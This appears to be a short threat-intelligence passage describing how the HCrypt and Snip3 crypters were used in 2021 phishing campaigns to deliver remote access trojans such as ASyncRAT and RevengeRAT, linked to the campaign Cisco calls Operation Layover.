Throughout 2021, Red Canary observed operators using crypters HCrypt and Snip3 to deliver various remote access trojans (RAT). Like other “as-a-service” threats, the developers sell or lease these crypters to affiliates who use them to carry out campaigns, expanding the threat landscape and creating new economies of scale. The “as-a-Service” ecosystem lowers the technical barrier to entry, allowing operators to purchase capabilities rather than develop them.
Like HCrypt, Snip3 is a crypter designed to evade detection and download additional malware. Snip3 is often delivered via phishing emails that prompt victims to download a VBA file. To evade detection, Snip3 leverages obfuscated PowerShell commands that contain the
RemoteSigned flag. We’ve observed these PowerShell commands connecting to top4top[.]io, a legitimate file-sharing service popular in Egypt, Algeria, and Yemen.
Because these crypters are used by various adversaries delivering different payloads, it can be difficult to cluster seemingly disparate activity. However, as public reporting on Snip3 has discussed specific targeting of victims in the aviation sector, and we know of at least one set of operators that consistently relies on phishing emails with lures related to travel or cargo, we’ve associated activity we saw in 2021 with a campaign Cisco calls Operation Layover. We assess with high confidence that certain activity we observed in 2021 overlaps with this long-running operation, also chronicled by researchers from Morphisec and Microsoft. While this campaign involved attempts to deliver ASyncRAT or RevengeRAT to victims, similar intrusion chains deliver other publicly available RATs.